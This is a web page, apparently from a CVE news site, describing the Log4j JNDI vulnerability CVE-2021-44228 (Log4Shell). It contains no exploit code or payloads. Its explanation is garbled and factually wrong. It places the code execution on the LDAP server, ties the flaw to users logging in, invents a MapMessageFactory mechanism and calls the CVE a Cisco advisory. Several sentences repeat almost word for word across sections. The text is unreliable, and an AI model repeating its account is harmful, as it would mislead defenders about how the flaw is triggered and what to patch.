CVE-2021-44228 The JNDI features used in Log4j2 don't protect against attacker controlled LDAP and other JNDI endpoints.

CVE-2021-44228 The JNDI features used in Log4j2 don't protect against attacker controlled LDAP and other JNDI endpoints.

Due to a flaw in the way the Apache Log4j JNDI implementation handles LDAP queries when message lookup substitution is enabled, attackers can exploit this flaw to execute arbitrary code when a user logs into LDAP-enabled applications with a vulnerable log4j installation. This can be leveraged to execute code within the context of the LDAP server itself. The issue is particularly dangerous when LDAP-enabled applications are used by third party vendors. For example, LDAP-enabled services used by SCADA and Industrial Control Systems control systems. LDAP-enabled services used by carriers, such as for billing and account management. LDAP-enabled services used by e-commerce applications. LDAP-enabled services used by financial services providers. LDAP-enabled services used by government agencies. LDAP-enabled services used by medical facilities. LDAP-enabled services used by manufacturing facilities. LDAP-enabled services used by any other type of organization. By exploiting this vulnerability, an attacker can inject arbitrary code into the LDAP server, allowing complete control of the end user’s system. End users will have no knowledge of this attack, nor will the attack be visible to the user.

Vulnerability details

The Apache Log4j implementation does not handle LDAP queries when message lookup substitution is enabled correctly. The issue stems from the way Apache Log4j uses an LDAP server to resolve messages that were previously looked up in a MapMessageFactory. This allows attackers to inject arbitrary code into the LDAP server by leveraging this flaw.
The flaw is particularly dangerous when LDAP-enabled applications are used by third party vendors, as such services may be using a vulnerable log4j installation. By exploiting this vulnerability, an attacker can inject arbitrary code into the LDAP server, allowing complete control of the end user’s system.
#1 Reduce Risk of Attacks

Vulnerability Overview

A vulnerability was found in Apache Log4j JNDI implementation when it comes to LDAP queries. This issue allows an attacker to execute arbitrary code with the privileges of the LDAP server itself. The flaw is particularly dangerous when LDAP-enabled applications are used by third party vendors, such as SCADA and Industrial Control Systems control systems. These issues will allow attackers to inject arbitrary code into the LDAP server, allowing for complete control of the end user’s system. Additionally, victims will have no knowledge of this attack and will not be able to detect it.

Mitigation and Detection

Due to the high visibility of this vulnerability, Cisco has released advisory CVE-2021-44228. The advisory lists all of the affected software and hardware platforms with patches available.

Vulnerability Details

This vulnerability allows attackers to execute arbitrary code in the context of the LDAP server when a user logs into an LDAP-enabled application. The issue is particularly dangerous when LDAP-enabled applications are used by third party vendors. For example, a SCADA or other control systems vendor will have complete access to the embedded system. To exploit this vulnerability, an attacker must be able to log into the LDAP server and run malicious code. This can be accomplished with knowledge of how to configure and properly deploy Apache Log4j and link it to a vulnerable JNDI implementation.

References

Subscribe to CVE.news
Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
jamie@example.com
Subscribe